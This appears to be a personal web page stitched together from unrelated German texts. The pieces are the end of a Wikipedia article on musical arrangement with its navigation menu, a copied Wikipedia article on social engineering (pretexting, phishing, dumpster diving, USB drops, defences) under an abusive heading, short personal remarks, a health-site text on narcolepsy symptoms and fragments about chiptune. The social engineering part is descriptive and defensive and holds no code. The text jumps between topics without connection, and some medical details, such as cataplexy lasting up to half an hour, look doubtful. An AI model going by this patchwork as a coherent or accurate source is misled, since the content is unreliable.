Im Laufe der Musikgeschichte wurden Arrangements nicht nur von anderen Arrangeuren, sondern auch von den Komponisten der Originalwerke selbst vorgenommen. Im 19. Jahrhundert wuchs der Bedarf an leicht auszuführenden Bearbeitungen bekannter Werke etwa für Tanzorchester. Seit dieser Zeit erhielt der Begriff des Arrangements den Beigeschmack des „aus zweiter Hand stammenden Werks“. Denn Meisterwerke der Musik wurden häufig an unzulängliche Besetzungen insbesondere in der Salon- oder Kaffeehausmusik und an die Vorlieben weniger anspruchsvoller Hörerschichten angepasst, die nur die populären „schönen Melodien“ – herausgelöst aus qualitativem musikalischen Zusammenhang – hören wollten. Arrangement im Jazz

Charakteristisch für den Jazz ist, dass wegen vorherrschender Improvisation meist keine Notation vorliegt und damit auch keine Partituren für einzelne Instrumente vorhanden sind, wodurch das Arrangement besondere Bedeutung erhält. Unter Jazzarrangement versteht man die Einrichtung eines Musikstücks für eine andere als die originale Besetzung. Im Jazz erlangte das ausgeschriebene Arrangement besonders zu Zeiten der Big Band große Bedeutung; deren Bandleader kultivierten die Jazzarrangements für größere Bands, indem sie auf den Leistungen eines Jelly Roll Morton als Arrangeur aufbauten.[8] Im Gegensatz dazu steht das „Head Arrangement“ als zwischen den Musikern lediglich mündlich abgesprochenem, spontanem Musikverlauf. Das Standard-Arrangement sieht im Jazz vor, dass nach dem Intro ein Head Arrangement folgt, das zu den Soli überleitet, die wiederum durch ein Head Arrangement abgelöst werden, um danach zum Outro zu gelangen.[9] Im Jazz wird das Ausgangsmaterial (das „Original“) lediglich als musikalischer Kern verstanden; das jeweilige Arrangement ist die eigentliche musikalische Schöpfung. Deshalb wird im Jazz der Arrangeur oft als der eigentliche Komponist angesehen. Viele Jazztitel sind erst in der Form eines bestimmten Arrangements populär geworden, so etwa In the Mood in der Fassung von Glenn Miller (aufgenommen am 1. August 1939). Arrangements galten und gelten im Jazz als einzigartige Identität für die Jazzband.[10] Im Jazz dient das Arrangement als Alternative zur Improvisation und nicht als Ersatz der Improvisation wie in der Pop- und Rockmusik. Arrangement in Pop- und Rockmusik

Das Arrangement ist in der Pop- und Rockmusik spätestens seit Yesterday von den Beatles (17. Juni 1965) nicht mehr an die übliche Instrumentation einer Beatband gebunden. Es kann sich jedoch auch eng an das Original anlehnen so wie Rock Around the Clock von Bill Haley (12. April 1954) im Vergleich zum Original von Sonny Dae and his Knights (20. März 1954). Vorsichtige Neugestaltungen wie Ray Charles‘ Coverversion von Eleanor Rigby (März 1968; Original von den Beatles; 6. Juni 1966) stehen umfassenden Neuarrangements wie dem Supremes-Hit You Keep Me Hangin’ On (1. August 1966) von Vanilla Fudge (Mai 1967) gegenüber. Der letztgenannte Musiktitel ist ein Beispiel dafür, wie stark ein Arrangement zur Veränderung des Originals beitragen kann. Im Ultrasonic-Studio entstand mit Vanilla Fudge in nur einem Take eine epische Version des Supremes-Hits. Während sich Coverversionen häufig stark an das Original anlehnen, war in diesem Fall jedoch das Original kaum noch wiederzuerkennen. Das in Mono aufgenommene Stück wurde auf 6:47 min ausgedehnt und auf Zeitlupentempo verlangsamt, denn das ursprüngliche Tempo wurde auf die Hälfte reduziert. Der psychedelische Sound mit einer neoklassischen Orgelpartitur und Sitar-Passagen verfremdet das Original bis zur Unkenntlichkeit. Die auf 2:50 min verkürzte Single-Fassung erschien am 2. Juni 1967 und erregte weltweites Aufsehen.

Berühmte Arrangeure der Popmusik waren Leiber/Stoller, Jack Nitzsche, Phil Spector, George Martin oder Todd Rundgren. Das Beispiel des Musikproduzenten George Martin zeigt, dass die Aufgaben zwischen Musikproduzent und Arrangeur in der kommerziellen Musik oft fließend sind. Funktion

Das Arrangement soll dem Zuhörer eine weitere Variante der Interpretation des Originals nahebringen. Es kann andere Hörerkreise erschließen, wenn es im Vergleich zum Original einen anderen Musikstil präsentiert wie etwa Puttin’ on the Ritz von Taco (September 1982) gegenüber Leo Reismans Original (20. Januar 1930). Aus kommerziellen Gründen wird ein im Original durchgefallener Song mit Hilfe eines attraktiveren Arrangements hitparadenfähig umgestaltet so wie bei Chubby Checkers Version von The Twist, dessen Original von Hank Ballard (11. November 1958) stammte. Checkers Version wies derart frappierende Ähnlichkeiten mit dem Original auf, dass Hank Ballard beim Radiohören dachte, es sei sein Stück.[11] Checkers Version war identisch in Tonhöhe, Rhythmus und Gesang. Während das Original – zumal B-Seite – unterging, entwickelte sich Checkers Coverversion zum Millionenseller.

Das Arrangement verleiht dem Musikstück seinen prägenden Charakter, der zum Wiedererkennungswert beitragen kann. Durch ein Arrangement kann die vom Komponisten vorgegebene Struktur einer Komposition simpler oder komplexer ausgestaltet werden. Das Arrangement ist das zentrale Stilmittel der Pop- und Rockmusik. „Der Arrangeur ist das wichtigste Bindeglied zwischen einem Komponisten und dessen Komposition und den Musikern bzw. den Orchestern, die diese Musikstücke aufführen oder aufnehmen. Seine Aufgabe besteht also darin, eine bereits existierende Komposition für jede Art von Besetzung und in jeder Stilistik bearbeiten zu können.“[12]

Heute wird insbesondere bei elektronischer und Popmusik unter dem Arrangement mitunter auch ein Teil der Bearbeitung gezählt, welcher streng genommen eher als Teil der Komposition gesehen wird bzw. einem Remix nahekommt. Als Arrangeur ist oft jemand angegeben, der bei einer bereits fertigen Aufnahme noch einmal am Aufbau des Musikstückes gearbeitet hat. Die verschiedenen Tätigkeiten sind mitunter nicht ganz klar voneinander abzugrenzen. Abgrenzungen Scene.org

Mit dem Arrangement ist also nicht die Instrumentation an sich gemeint, sondern vielmehr die individuelle, künstlerische Art und Prägung der Aufführung durch die jeweiligen Interpreten. Transkription ist lediglich die Umschreibung von einer Notenschrift in eine andere oder die Übertragung von akustisch wahrgenommener Musik in eine Notenschrift, so dass hier die für ein Arrangement wichtigen gestalterischen Aspekte fehlen. Head Arrangements sind die zwischen Musikern vor der Aufführung abgesprochenen Gestaltungen eines Musikstückes, ohne dass diese in Noten festgehalten werden.[13] Dabei wird die Reihenfolge der Soli oder das Wechselspiel zwischen Rhythmus- und Melodiegruppe festgelegt. Es handelt sich um spontane, meist im Jazz zu findende Gestaltungen, die auch für den Memphis-Soul charakteristisch waren. Zwar sind in der Musik die Wiederholungen von einzelnen Phrasen nichts Besonderes und finden im Refrain einen zentralen Baustein, doch gibt es Musikstile, die eine intensive Wiederholung einzelner Fragmente präsentieren. Dieses repetitive Arrangement ist typisch im Country Blues, Mambo, Salsa und Techno. Im Jazz spricht man von Live-Arrangement, wenn die Verteilung der Aufgaben unter den Mitspielenden erst kurz vor oder sogar erst während der Aufführung mündlich oder auf Zeichen erfolgt. Dazu müssen das Hauptthema und die Harmoniefolge allen Musikern bekannt sein. Die Tutti-Abschnitte sowie zusätzliche gewünschte Effekte muss der Bandleader vorab erläutern oder einstudieren, sie liegen (seit den 1920er Jahren) deshalb als Partitur vor. Die Solo-Teile können dann von einzelnen Musikern improvisierend gestaltet werden, wobei in besseren Arrangements auch diesen Teilen jeweils vollständige Partituren zugrunde liegen, die im Verlauf eine thematisch rhythmische Entwicklung aufweisen und die Veränderung von Solist zu Solist in die Gesamtentwicklung des Stücks musikalisch einbauen. Rechtsfragen

Das neue Arrangement eines Musikwerkes ist stets abhängige Bearbeitung nach § 3 UrhG oder – bei fehlender Schöpfungshöhe des Arrangements – eine abhängige andere Umgestaltung im Sinne von § 23 UrhG.[14] In beiden Fällen ist die Einwilligung des Originalkomponisten erforderlich. Das individuelle Arrangement eines Musikwerkes ist schutzfähig, wenn der Arrangeur durch den Einsatz von Stilmitteln etwas Eigenschöpferisches schafft.[15] Dem klassischen Arrangement spricht die Rechtsprechung eine schöpferische Eigenart nur zu, sofern das Arrangement über das rein handwerkliche Anwenden musikalischer Lehren hinausgeht.[16] Da ein Arrangement begrifflich an einem bereits bestehenden und geschützten Werk vorgenommen wird, ist der Arrangeur als ein Bearbeiter im Sinne von § 3 UrhG anzusehen.[17] Bei gemeinfreien Musikwerken im Bereich der U-Musik wird nicht mehr ihr ursprünglicher Komponist angegeben, sondern ihr Arrangeur. Rechtsansprüche der Arrangements werden durch die Gema vertreten. Literatur

   Markus Fritsch, Peter Kellert: Arrangieren und Produzieren. Leu Verlag, ISBN 3-928825-22-4.
   Ulrich Kaiser, Carsten Gerlitz: Arrangieren und Instrumentieren, Barock bis Pop. Kassel 2005, ISBN 3-7618-1662-6.
   George T. Simon: Die Goldene Ära der Bigbands. hannibal Verlag, ISBN 3-85445-243-8.
   David Baker: Arranging & Composing, For the Small Ensemble: Jazz, R&B, Jazz-Rock. alfred, komplette Anleitung von der Melodie über Harmonisierung bis hin zur sechsstimmigen Partitur.
   Paul Wiebe: Bläser arrangieren. Wizoobooks Verlag, 2007, ISBN 978-3-934903-61-6.
   Achim Brochhausen: Arrangement Pop/Jazz/Rock. audio-workshop Fachskript, Leseprobe (PDF; 447 kB)
   Paul Wiebe: Streicher arrangieren. Wizoobooks Verlag, 2009, ISBN 978-3-934903-70-8 – Wege zum perfekten Orchestersatz am Computer.
   Andreas N. Tarkmann: Arrangieren für Kammermusikensembles. Staccato-Verlag, Düsseldorf 2010, ISBN 978-3-932976-34-6.

Weblinks

Wiktionary: Arrangement – Bedeutungserklärungen, Wortherkunft, Synonyme, Übersetzungen

Einzelnachweise A. A. Schmieder: Werkintegrität und Freiheit der Interpretation. In: NJW. 1990, 1945, 1947 Sebastian Schunke: Das Bearbeitungsrecht in der Musik und dessen Wahrnehmung durch die GEMA. 2008, S. 63 Wieland Ziegenrücker, Peter Wicke: Sachlexikon Popularmusik. 1987, S. 25 Tibor Kneif: Sachlexikon Rockmusik. 1978, S. 25. Wolf Moser: Das Repertoire aus zweiter Hand. Die Geschichte der Übertragung und ihrer Aufgaben. In: Gitarre & Laute, 9, 1987, 3, S. 19–26; hier: S. 19 (zu Adaption, Arrangement und Bearbeitung) Renate Stephan: Johann Strauß, der Walzerkönig. 1999, S. 46 Jürgen Wölfer: Lexikon des Jazz. 1993, S. 28. Richard Lawn: Experiencing Jazz. 2013, S. 127 Paul E. Rinzler: Jazz Arranging and Performance Practice. 1999, S. 60 f. Richard Lawn: Experiencing Jazz, 2013, S. 36 f. Fred Bronson: The Billboard Book of Number One Hits. 1985, S. 74 Peter Keller, Markus Fritsch: Arrangieren und Produzieren. 1995, S. 45 Jürgen Wölfer: Lexikon des Jazz, 1993, S. 212. Hans-Jürgen Homann: Praxishandbuch Musikrecht. 2006, S. 63 BGH GRUR 1991, 533, 535 Brown Girl II BGH GRUR 1981, 267, 268 – Dirlada

   Hans-Jürgen Homann: Praxishandbuch Musikrecht. 2006, S. 19

Normdaten (Sachbegriff): GND: 4285138-5 Kategorie:

   Arrangement und Instrumentation

Navigationsmenü

   Nicht angemeldet
   Diskussionsseite
   Beiträge
   Benutzerkonto erstellen
   Anmelden
   Artikel
   Diskussion
   Lesen
   Bearbeiten
   Quelltext bearbeiten
   Versionsgeschichte

Suche

   Hauptseite
   Themenportale
   Zufälliger Artikel

Mitmachen

   Artikel verbessern
   Neuen Artikel anlegen
   Autorenportal
   Hilfe
   Letzte Änderungen
   Kontakt
   Spenden

Werkzeuge

   Links auf diese Seite
   Änderungen an verlinkten Seiten
   Spezialseiten
   Permanenter Link
   Seiten­informationen
   Wikidata-Datenobjekt
   Artikel zitieren

In anderen Projekten

   Commons

Drucken/­exportieren

   Buch erstellen
   Als PDF herunterladen
   Druckversion

In anderen Sprachen

   English
   Español
   Français
   Hrvatski
   Italiano
   Nederlands
   Polski
   Русский
   Türkçe

Links bearbeiten

   Diese Seite wurde zuletzt am 16. Juli 2019 um 14:30 Uhr bearbeitet.
   Abrufstatistik · Autoren 


Mono & Nikitaman - Stell Dir vor es ist Krieg - Und keiner geht hin...

Wikipedia schreibt Scheissdreck über Social Engineering. (Computer Hacker-Kunst)

Social Engineering [ˈsəʊʃl̩ ˌɛndʒɪˈnɪəɹɪŋ] (engl. eigentlich „angewandte Sozialwissenschaft“, auch „soziale Manipulation“) nennt man zwischenmenschliche Beeinflussungen mit dem Ziel, bei Personen bestimmte Verhaltensweisen hervorzurufen, sie zum Beispiel zur Preisgabe von vertraulichen Informationen, zum Kauf eines Produktes oder zur Freigabe von Finanzmitteln zu bewegen.

Social Engineers spionieren das persönliche Umfeld ihres Opfers aus, täuschen Identitäten vor oder nutzen Verhaltensweisen wie Autoritätshörigkeit aus, um geheime Informationen oder unbezahlte Dienstleistungen zu erlangen. Häufig dient Social Engineering dem Eindringen in ein fremdes Computersystem, um vertrauliche Daten einzusehen; man spricht dann auch von Social Hacking ['hækɪŋ].
Inhaltsverzeichnis

    1 Geschichte
    2 Grundmuster
    3 Weitere mögliche Formen
        3.1 Phishing
        3.2 Dumpster Diving
        3.3 USB Drop
    4 Abwehr
    5 Bekannte Social Engineers
    6 Siehe auch
    7 Literatur
    8 Weblinks
    9 Einzelnachweise

Geschichte

Eine frühe Form des Social Engineering wurde in den 1980er Jahren mit Phreaking praktiziert. Phreaker riefen unter anderem bei Telefongesellschaften an, gaben sich als Systemadministrator aus und baten um neue Passwörter, mit denen sie schließlich kostenlose Modemverbindungen herstellten.
Grundmuster

Das Grundmuster des Social Engineering zeigt sich bei fingierten Telefonanrufen: Der Social Engineer ruft Mitarbeiter eines Unternehmens an und gibt sich als Techniker aus, der vertrauliche Zugangsdaten benötigt, um wichtige Arbeiten abzuschließen. Bereits im Vorfeld hat er aus öffentlich zugänglichen Quellen oder vorangegangenen Telefonaten kleine Informationsfetzen über Verfahrensweisen, tägliches Bürogerede und Unternehmenshierarchie zusammengetragen, die ihm bei der zwischenmenschlichen Manipulation helfen, sich als Insider des Unternehmens auszugeben. Zusätzlich verwirrt er sein technisch ungebildetes Opfer mit Fachjargon, baut mit Smalltalk über scheinbar gemeinsame Kollegen Sympathie auf und nutzt Autoritätsrespekt aus, indem er droht, bei vom Opfer unterlassener Kooperation dessen Vorgesetzten stören zu müssen. Unter Umständen hat der Social Engineer bereits im Vorfeld Informationen gesammelt, dass ein bestimmter Mitarbeiter sogar wirklich technische Hilfe angefordert hat und bereits tatsächlich einen derartigen Anruf erwartet.

Trotz ihrer scheinbaren Banalität gelingen mit der Methode immer wieder spektakuläre Datendiebstähle. So gelang es einem amerikanischen Schüler 2015, den privaten E-Mail-Account des damaligen CIA-Direktors Brennan zu öffnen und drei Tage lang darauf zuzugreifen.[1][2]

Beim automatisierten Social Engineering, auch Scareware genannt, kommen spezielle Schadprogramme zum Einsatz, die den Nutzer verängstigen und so zu bestimmten Handlungen bewegen sollen.[3]
Weitere mögliche Formen
Phishing
→ Hauptartikel: Phishing

Eine bekannte Variante des Social Engineering ist das Phishing. Bei dieser unpersönlichen Variante werden fingierte E-Mails mit vertrauenserweckender Aufmachung an die potentiellen Opfer versendet. Inhalt dieser Nachrichten kann zum Beispiel sein, dass ein bestimmter Dienst, den man nutzt, eine neue URL hat und man sich auf dieser von nun an einloggen soll, wenn man ihn in Anspruch nehmen will. Bei dieser fingierten Seite handelt es sich, von Layout und Aufmachung her, um eine Kopie der originalen Webseite des Serviceanbieters. Dies soll dazu beitragen, das Opfer in Sicherheit zu wiegen. Fällt man darauf herein, so gelangen Kriminelle in den Besitz des Loginnamens und -passworts. Eine weitere Möglichkeit besteht darin, dass das Opfer von einem vermeintlichen Administrator dazu aufgefordert wird, die Logindaten als Antwort zurückzusenden, da angeblich technische Probleme vorliegen. Das Grundmuster ist ähnlich dem fingierten Telefonanruf, denn auch hier gibt sich der Social Engineer in der Regel als technischer Mitarbeiter aus, der zur Datenüberprüfung oder -wiederherstellung die Geheiminformation benötigt. Anders als dort verfügt der Angreifer hier meist über nicht viel mehr als die E-Mail-Adresse des Empfängers, was die Attacke weniger persönlich und damit auch weniger wirkungsvoll macht.

Effizienter ist das Spear-Phishing (abgeleitet von der englischen Übersetzung des Begriffs Speer), worunter ein gezielter Angriff zu verstehen ist. Hierbei beschafft sich der Angreifer z. B. über die Studentenvertretung einer Hochschule die Mailadressen der dort eingeschriebenen Studenten, um an diese gezielt eine Phishing-Mail einer lokal ansässigen Bank oder Sparkasse zu übersenden. Die „Trefferquote“ bei dieser Art von Phishing-Attacken ist höher als bei normalen Angriffen, da die Wahrscheinlichkeit, dass ein Student seine Bankverbindung bei diesem Institut unterhält, sehr groß ist.
Dumpster Diving

Hierbei wird der Müll des Opfers durchwühlt und nach Hinweisen und Anhaltspunkten über das soziale Umfeld gesucht. Diese können dann in einem darauf folgenden Anruf dazu verwendet werden, um das Vertrauen des Opfers zu erschleichen.
USB Drop

Die Sicherheitsfirma Kaspersky Lab deckte auf, dass eine unbekannte Hackergruppe seit 2001 rund 500 Firmen mit USB Drops angegriffen hatte. Dabei erhielten zufällige Mitarbeiter infizierte USB-Sticks, deren Verwendung ihren PC infizierte und den Hackern Zugriff auf das interne Netzwerk der Firma gewährte.[4] Eine Möglichkeit für Angreifer ist es, die infizierten USB-Sticks vor dem Firmengelände als Werbegeschenk zu verteilen.[5]
Abwehr

Die Abwehr von Social Engineering ist nicht einfach zu bewerkstelligen, da der Angreifer im Grunde positive menschliche Eigenschaften ausnutzt: Den Wunsch etwa, in Notsituationen unbürokratisch zu helfen oder auf Hilfe mit Gegenhilfe zu reagieren. Generelles Misstrauen zu schüren, würde auch die Effektivität und die vertrauensvolle Zusammenarbeit in Organisationen negativ beeinflussen. Den wichtigsten Beitrag zur Bekämpfung von Social Engineering liefert deshalb im konkreten Fall das Opfer selbst, indem es Identität und Berechtigung eines Ansprechenden zweifellos sicherstellt, bevor es weitere Handlungen vornimmt. Bereits die Rückfrage nach Name und Telefonnummer des Anrufers oder dem Befinden eines nicht existierenden Kollegen kann schlecht informierte Angreifer enttarnen. Höflich um Geduld zu bitten, wenn eine heikle Anfrage auch noch so dringend vorgetragen wird, sollte deshalb gezielt trainiert werden. Auch scheinbar geringfügige und nutzlose Informationen sollten Unbekannten nicht offengelegt werden, denn sie könnten in folgenden Kontaktaufnahmen zum Aushorchen anderer missbraucht werden oder zusammen mit vielen anderen für sich genommen nutzlosen Angaben zum Abgrenzen eines größeren Sachverhalts dienen. Wichtig ist eine schnelle Warnung aller potenziellen weiteren Opfer; erste Ansprechpartner sind die Sicherheitsabteilung des Unternehmens, die Kontaktadresse des E-Mail-Providers und Mitmenschen und Institutionen, deren Angaben zur Vorspiegelung falscher Tatsachen missbraucht wurden. Folgende Punkte sollten unbedingt beachtet werden:

    Ist die Identität des Absenders einer E-Mail nicht sicher, sollte man stets misstrauisch sein.
    Bei Anrufen sollten auch scheinbar unwichtige Daten nicht sorglos an Unbekannte weitergegeben werden, da diese die so erhaltenen Informationen für weitere Angriffe nutzen können.
    Bei Antworten auf eine E-Mail-Anfrage sollten unter keinen Umständen persönliche oder finanzielle Daten preisgegeben werden, egal von wem die Nachricht zu kommen scheint.
    Keine Links aus E-Mails verwenden, die persönliche Daten als Eingabe verlangen. Stattdessen die URL selbst im Browser eingeben.
    Bei Unklarheit über die Echtheit des Absenders diesen nochmals telefonisch kontaktieren, um die Authentizität der E-Mail zu überprüfen.

Der US-Sicherheitsspezialist Bruce Schneier zweifelt angesichts der Komplexität und der möglichen Nebenwirkungen von präventiven Maßnahmen gegen Social Engineering sogar generell an deren Wert und schlägt stattdessen Strategien vor, die auf Schadensbegrenzung und schnelles Recovery bauen.[6]

Schulungen der Mitarbeiter sind zwar notwendig, aber nur begrenzt hilfreich, wie Studien an der US-Militärakademie West Point gezeigt haben.[7] Im Vorfeld können sogenannte Social-Engineering-Penetrationstests durchgeführt werden.
Bekannte Social Engineers

Öffentlich bekannt wurde die Methode vor allem durch den Hacker Kevin Mitnick, der durch seine Einbrüche in fremde Computer eine der meistgesuchten Personen der Vereinigten Staaten war. Mitnick selbst meinte, Social Engineering sei die bei weitem effektivste Methode, um an ein Passwort zu gelangen, und schlage rein technische Ansätze in Sachen Geschwindigkeit um Längen.

Bekannt wurde 2010 der US-IT-Experte Thomas Ryan mit seiner Kunstfigur Robin Sage. Die virtuelle Internetschönheit stellte über soziale Netzwerke Kontakte zu Militärs, Industriellen und Politikern her und entlockte ihnen vertrauliche Informationen. Ryan ging nach einem Monat mit den Ergebnissen des Experiments an die Öffentlichkeit, um vor allzu großer Vertrauensseligkeit in sozialen Netzwerken zu warnen.[8]

Der für die Computersicherheit tätige Hacker Archangel zeigte in der Vergangenheit, dass Social Engineering nicht nur bei der Offenlegung von Passwörtern wirksam ist, sondern auch bei der illegalen Beschaffung von Pizzen, Flugtickets und sogar Autos funktioniert.

Weitere bekannte Social Engineers sind der Scheckbetrüger Frank Abagnale, Miguel Peñalver, David „Race“ Bannon, der sich als Interpol-Agent ausgab, der Grundstücksbetrüger Peter Foster, der Hochstapler Steven Jay Russell und der Hochstapler Gert Postel, der mit einem weiteren Hochstapler, Reiner Pfeiffer, eine Rolle in der Barschel-Affäre gespielt hat.
Siehe auch

    Rubber-hose cryptanalysis

Literatur

    Uwe Baumann, Klaus Schimmer, Andreas Fendel: SAP Pocketseminar. „Faktor Mensch – Die Kunst des Hackens oder warum Firewalls nichts nützen“. SAP 2005, Fibel (Memento vom 9. August 2012 im Internet Archive) (PDF; 363 kB).
    Michael Lardschneider: Social Engineering. Eine ungewöhnliche aber höchst effiziente Security Awareness Maßnahme. In: Datenschutz und Datensicherheit. DuD. 9, 2008 (ISSN 1614-0702 print), S. 574–578.
    Kevin D. Mitnick, William L. Simon: Die Kunst der Täuschung. Risikofaktor Mensch. (Nachdruck der 1. Auflage). mitp, Heidelberg 2006, ISBN 3-8266-1569-7 (Originalausgabe: The Art of Deception. Controlling the Human Element of Security. Wiley, Indianapolis IN 2002, ISBN 0-471-23712-4 (englisch)).
    Kevin D. Mitnick, William L. Simon: Die Kunst des Einbruchs. Risikofaktor IT. mitp, Heidelberg 2006, ISBN 3-8266-1622-7.
    Klaus Schimmer: Wenn der Hacker zweimal fragt! Wie bereite ich meine Mitarbeiter auf Social Engineering Angriffe vor? In: Datenschutz und Datensicherheit. DuD. 9, 2008, S. 569–573.
    Bettina Weßelmann: Maßnahmen gegen Social Engineering: Training muss Awareness-Maßnahmen ergänzen. In: Datenschutz und Datensicherheit. DuD. 9, 2008, S. 601–604.
    Stefan Schumacher: Die Psychologischen Grundlagen des Social-Engineering. In: Proceedings. GUUG Frühjahrsfachgespräches 2009, 10.–13. März 2009, Hochschule Karlsruhe. GUUG, München 2009, ISBN 978-3-86541-322-2, S. 77–98 (UpTimes 1, 2009).
    Stefan Schumacher: Psychologische Grundlagen des Social Engineering. In: Die Datenschleuder. 94, 2010, ISSN 0930-1054, S. 52–59, online (PDF; 8,9 MB).
    Christopher Hadnagy: Social Engineering – The Art of Human Hacking. Wiley, Indianapolis IN 2010, ISBN 978-0-470-63953-5 (englisch)

Weblinks

    sicherheitskultur.at
    computec.ch freie deutschsprachige Dokumente
    social-engineer.org englischsprachige Dokumente und Wiki
    Englischsprachige Praxisbeispiele
    Social Engineering Zusammenfassung (PDF; 91 kB) über die Grundlagen von Social Engineering und Gegenmaßnahmen (deutsch)
    Johannes Wiele: Social Engineering erkennen. In: LANline, über Möglichkeiten, als Opfer eine Social-Engineering-Attacke zu erkennen

Einzelnachweise
Neue Zürcher Zeitung: Teenager will privates E-Mail-Konto von CIA-Chef geknackt haben vom 20. Oktober 2015, abgerufen am 20. Oktober 2015
Wired: Teen Who Hacked CIA Director’s Email Tells How He Did It vom 19. Oktober 2015, abgerufen am 20. Oktober 2015.
(„Wie der Datendieb verlauten ließ, will er die Zugangsdaten zu Brennans E-Mail-Konto mittels Social Engineering erhalten haben: Er hat offenbar Mitarbeiter von Verizon dazu gebracht, Daten von Brennan herauszugeben.“)
Social Engineering: Sicherheitslücke Mensch. 1und1.de/digitalguide. Abgerufen am 14. September 2017.
Mirjam Hauck: Schwachstelle Mensch. In: sueddeutsche.de. 17. Februar 2015, ISSN 0174-4917 (sueddeutsche.de [abgerufen am 15. November 2017]).
Mirjam Hauck: Schwachstelle Mensch. In: sueddeutsche.de. 17. Februar 2015, ISSN 0174-4917 (sueddeutsche.de [abgerufen am 15. November 2017]).
Johannes Wiele: Nachsorge ist besser als Vorsicht. Bruce Schneier im Gespräch mit Wissenschaftlern. In: LANline 3/2008 (ISSN 0942-4172).
Technology Review: Die neuen Waffen der Phisher. heise.de

    Ein kurzes, heißes Leben. In: sueddeutsche.de, 2. August 2010

Kategorien:

    Hackertechnik (Computersicherheit)IT-SicherheitSozialpsychologiePhishing <br>

=>Die können ja noch nicht mal "Seele" richtig Deutsch ausschreiben.

Mein Arbeits Artefakt: ...

Toy Story gafällt mir von der Auflösung bzw. mal etwas ohne Rauschen. Ansonsten würde ich dringend auf YouTube (zbsp. mit Beauty) gegen Drogen vorgehen. Musik Stile wie Drum & Bass sollten nicht mit Drogenkonsum besetzt werden. Außerdem wäre ein Punktesystem für Altersklassen in Bezug auf die Startseiten sehr gut.

Narkolepsie

normal_narkolepsie-symptome.jpg



Artikelinhalt

    Narkolepsie (Schlafkrankheit)
    Symptome der Narkolepsie

Narkolepsie Symptome werden in der Regel anhand vier verschiedener Haupt-Symptome unterschieden. Diese vier zentralen Narkolepsie Symptome werden zudem als Symptom Komplex oder als narkoleptische Tetrade benannt. Diese vier Symptome der Schlafkrankheit sind Schlafzwang, Kataplexien, abnormer Schlafrhythmus sowie Schlaflähmung.
Narkolepsie Symptom Nr. 1: Schlafzwang

Die Schlafkrankheit (im Volksmund auch als Schlummerzwang bezeichnet) äußert sich zunächst oft nur durch eine ganztägig bestehende, erhöhte Schläfrigkeit. Hinzu können die imperativen Schlafattacken kommen.

Die Müdigkeit steigert sich und es treten Konzentrationsschwächen auf, falls sich der Narkolepsie-Patient zum Wachbleiben zwingt. Meist treten die Schlafattacken oder die unwiderstehliche Müdigkeit in Situationen auf, in denen auch gesunde Menschen schläfrig werden, so etwa als Beifahrer, im Dämmerlicht (auch bei öffentlichen Veranstaltungen wie im Kino oder Theater), beim Lesen und Fernsehen, bei Vortragsveranstaltungen oder bei monotonen Arbeiten.

Hinzu schlafen Narkoleptiker auch plötzlich ungewollt ein, wenn andere Menschen, etwa durch Aufregung, hellwach sind – zum Beispiel während sie selbst einen Vortrag halten.
Narkolepsie Symptom Nr. 2: Kataplexie

Neben der Tagesschläfrigkeit kommt es bei einem Teil der Narkolepsie-Patienten mehr oder weniger häufig zu plötzlichen und kurzen Verlusten der Kontrolle über die Muskeln, die als Kataplexien bezeichnet werden.

Bei leichten Kataplexien kann nur die Gesichtsmuskulatur erschlaffen, schwere Anfälle lassen den gesamten Körper zusammensacken, was auf Außenstehende meist sehr dramatisch wirkt. Ausgelöst werden können Kataplexien beispielsweise durch starke Gefühle wie Lachen (man spricht in diesem Zusammenhang auch vom sogenannten Lachschlag), Angst, Ärger oder Überraschung. So können einem zum Beispiel die Knie weich werden, wenn jemand einen guten Witz erzählt.

Der Narkolepsie-Patient ist während einer Kataplexie bei vollem Bewusstsein, kann aber unter Umständen die Augenlieder nicht öffnen. Seine Sinne funktionieren völlig normal, auch haben Betroffene im Gegensatz zu Epileptikern noch die Kontrolle über ihre Ausscheidungsfunktionen. Eine Kataplexie kann bis zu einer halben Stunde andauern und durch den Zusammenhang mit emotionalen Zuständen noch verlängert werden, etwa wenn derjenige sich darüber ärgert, dass er die Kataplexie nicht beenden kann.

Auch Erinnerungen an Emotionen können Kataplexien auslösen. Kataplexie gilt als sicheres Symptom für Narkolepsie, was eine Diagnose wesentlich erleichtert und andere Schlafstörungen ausschließt.
Narkolepsie Symptom Nr. 3: Abnormer Schlafrhythmus

Der abnorme Schlafrhythmus kann sich etwa in einem Zyklus von je vier Stunden Schlaf und Wachsein abwechselt. Dieser Rhythmus setzt sich auch nachts fort, weshalb Narkolepsie-Betroffene unter teils lang anhaltenden Nacht-Wach-Phasen leiden. Zwar wachen auch gesunde Menschen nachts auf, doch schläft man in der Regel gleich wieder ein. Sind die Nacht-Wach-Phasen eines Narkoleptikers nur kurz, so ist sein Schlaf trotzdem äußerst seicht.

Jegliche äußere Einflüsse, wie Licht, Lärm oder Bewegung (etwa wenn sich der Partner im selben Bett umdreht) lassen den Narkolepsie-Patienten aufwachen. Zudem sind die Traumphasen gestört; Betroffene erinnern sich durch den leichten Schlaf häufiger an ihre Träume und neigen verstärkt zu (teilweise in der nächsten Schlafphase fortgesetzten) Alpträumen. Der leichte Schlaf bei Narkolepsie ist nicht erholsam und verstärkt das Schlafbedürfnis und die Konzentrationsschwächen am Tag.
Narkolepsie Symptom Nr. 4: Schlaflähmung

Schlaflähmung ist ähnlich wie die Katalepsie ein Zustand, bei dem der Betroffene die Kontrolle über seine Muskeln verliert. Die Schlaflähmung tritt in den Übergangsphasen beim Einschlafen oder Aufwachen ein, manche beschreiben Schlaflähmung als einen Zustand zwischen Wachsein und Träumen. Anders als bei der Kataplexie steht die Schlaflähmung nicht im Zusammenhang mit Emotionen. Ein weiterer Unterschied ist, dass Außenstehende den Bewegungsunfähigen durch Berührung aus der Starre erlösen können.

Im Gegensatz zu den oben beschriebenen Narkolepsie-Symptomen wird die Schlafparalyse nicht von allen Patienten als einheitlich negativ empfunden. Manche Narkoleptiker beschreiben den Zustand als angenehm oder können sich währenddessen besser ungelöster Probleme annehmen. Unangenehm wird die Schlaflähmung besonders, wenn sie in einer unbequemen Haltung eintritt. Sie kann jedoch äußerst belastend sein, wenn gleichzeitig schlafbezogene Halluzinationen auftreten.

Diese werden oft als die am meisten psychisch belastenden Symptome der Narkolepsie empfunden, da der Betroffene Erscheinungen hat, die auf ihn vollkommen real wirken. Selbst nach dem Aufstehen können Narkoleptiker davon überzeugt bleiben, dass ein Einbrecher an ihrem Bett stand oder sie vergewaltigt wurden.

Mehr zum Thema: https://www.gesundheit.de/krankheiten/gehirn-und-nerven/schlafstoerungen/narkolepsie-symptome

Ohne MOS nichts los

MOS_Technologies_6581.jpg

Chiptune
